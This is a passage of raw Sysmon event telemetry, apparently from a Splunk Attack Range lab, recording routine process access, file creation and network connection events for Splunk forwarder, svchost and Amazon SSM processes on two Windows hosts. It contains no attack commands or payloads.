Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4559D7C6EF3C09129C98BF13374568A0,SHA256=AB535A3210CB671E23599F52A8C1C43D624F120E57B6866860E277DBF7AA8DAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C6D-6151-F779-00000000FD01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8C6D-6151-F779-00000000FD01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.456{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C6D-6151-F779-00000000FD01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.441{69CF5F33-8C6D-6151-F779-00000000FD01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000980255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:35.245{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58392-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:38.768{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9191C6F09495017B75E9EEFD90ABA2A7,SHA256=A8BF8B30E6915231F19F969F69F9C14F2DD6ACFCD4EEC8DB06D90B1FB9BD7BD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:38.779{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58004C551856F6B37612231F2282725C,SHA256=85B5E5479480AA7891950DE5B9AA5CC6278FDEE39B8E3DF5D5015AA943981A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:38.764{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E702F2659A5D6F8FBC4FE5DC0AB34FB9,SHA256=B960CD0D953A234A49D3E51538DD1404BE94100743F0DB10C28FBA2E5435943B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:38.764{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F51216F8D1411EC279BF0282DD4C2408,SHA256=FCEEAD94A43599352BEE42720CC4A7C5D9D274C5EEAEE8A314335A7ACDB5CC19,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.472{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53478-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000980256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:39.971{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC824F4412E5662965A112FCA40CEDDA,SHA256=08126AD05489D5925155DF9AD8756B53506828876AED5837CB60C1FA2FA4DE67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:39.794{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6265BCD9FA12C7B29ACC8287F2925F2A,SHA256=E264D05F46CD3B7EFCF4B5C5E4710E4BA654DB8279E01D9377067D83402FF0D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:39.326{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=227154D524BF4337F1169D78175D914F,SHA256=410AA6DE34A599F304BA236A35F26A1E93B0649234A039931DB65FDEC93D2DAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.856{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53479-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.732{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58695-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:40.824{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CE84184DCC02A8C7007D58DB5D50263,SHA256=08FD9F122B5CB8B561432B9F972FC9A8E1483090D3C8A38ED937984019ACCC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:40.746{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E702F2659A5D6F8FBC4FE5DC0AB34FB9,SHA256=B960CD0D953A234A49D3E51538DD1404BE94100743F0DB10C28FBA2E5435943B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:41.846{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7418366D0C902018DC0672B13E79A8,SHA256=A3546A163AE734952524B7C60DBEA752CDBEF0732ADCFBFAEBB264F38A6ED2BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:41.018{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=172B7D7A814DB9120DA38711B30D3932,SHA256=60DD02E10161C8D4133AA4226C083A974CDC6E14FFD0C56C983425001B963694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:41.464{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4314MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:39.581{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53911-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:38.800{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59972-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:42.925{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEBA23415745FBD56FD503C76945CEC,SHA256=17F44A8698D034BBCA221167741890F203B84F03DA30274B91AE818E70AA44A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:42.050{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48646BF3B3AE0694C80CC75F9DDD9FC9,SHA256=04B5F75209869F0FF9C753C9376CCF22862236C5E57B081FC1D56ABFBC884442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:42.478{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4315MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:43.944{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39A293850A8094C1FB88F163A8E1BC8,SHA256=98603BA0DE06EC7C1F5570F839A63AEE992799362346642CA150C4B0EC5E25F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:39.656{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59466-false10.0.1.12-8000- 23542300x8000000000000000980259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:43.288{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C969428C7F7C00C8E863E801E392EB9,SHA256=827D89367B2517FECFA0A043EA203D6E0773F82BC55D89804FE3E5B60DB691B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:44.397{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CC51AB36C90448E817F0686A0682720,SHA256=3B292075B371E4C581243E2D81153815284B5DF4B9725616B19D2F1B478FC70E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.959{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=149BE6F19FCE1285D473D037E172FB8E,SHA256=A69271DF7B5BC214A643A6540C1193D587E99FC2A08795D1F774DC87240DDAC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.644{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C74-6151-657A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 